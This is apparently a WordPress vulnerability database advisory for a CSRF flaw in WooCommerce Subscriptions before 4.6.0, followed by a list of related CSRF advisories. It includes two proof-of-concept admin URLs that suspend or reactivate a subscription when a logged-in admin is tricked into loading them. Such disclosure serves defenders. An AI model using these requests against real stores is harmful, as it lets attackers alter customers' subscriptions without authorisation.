WooCommerce Subscriptions < 4.6.0 – Subscription Suspension/Activation via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when suspending and activating subscriptions, which could allow attackers to make a logged in admin suspend or activate arbitrary subscription via a CSRF attack

Proof of Concept

Deactivate subscription with ID 53:
https://example.com/wp-admin/edit.php?s=&post_status=all&post_type=shop_subscription&_wpnonce=&_wp_http_referer=&action=on-hold&m=0&_wcs_product=&_payment_method=&_customer_user=&paged=1&post%5B%5D=53&action2=on-hold


Activate subscription with ID 53:
https://example.com/wp-admin/edit.php?post_type=shop_subscription&marked_on-hold=1&changed=1&ids=53&post=53&_wpnonce=&action=active

Affects Plugins

woocommerce-subscriptions

Fixed in 4.6.0

References

URL

https://hackerone.com/reports/1708140

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

foobar7

Verified

Yes

WPVDB ID

92209e5c-d764-45c6-830d-b7ff34bba393

Timeline

Publicly Published

2023-09-11 (about 2 years ago)

Added

2023-09-11 (about 2 years ago)

Last Updated

2023-09-11 (about 2 years ago)

Other

Published

Title

Published

2024-08-19

Title

BP Profile Search < 5.8 - Cross-Site Request Forgery to Reflected Cross-Site Scripting

Published

2024-10-21

Title

EKC Tournament Manager < 2.2.2 - Cross-Site Request Forgery to Arbitrary File Upload

Published

2023-02-28

Title

WP Social Bookmarking Light <= 2.0.7 - Cross-Site Request Forgery (CSRF)

Published

2025-02-03

Title

Print PDF Generator and Publisher < 1.2.1 - Cross-Site Request Forgery

Published

2025-03-11

Title

Featured Posts Grid <= 1.7 - Cross-Site Request Forgery to Cross-Site Scripting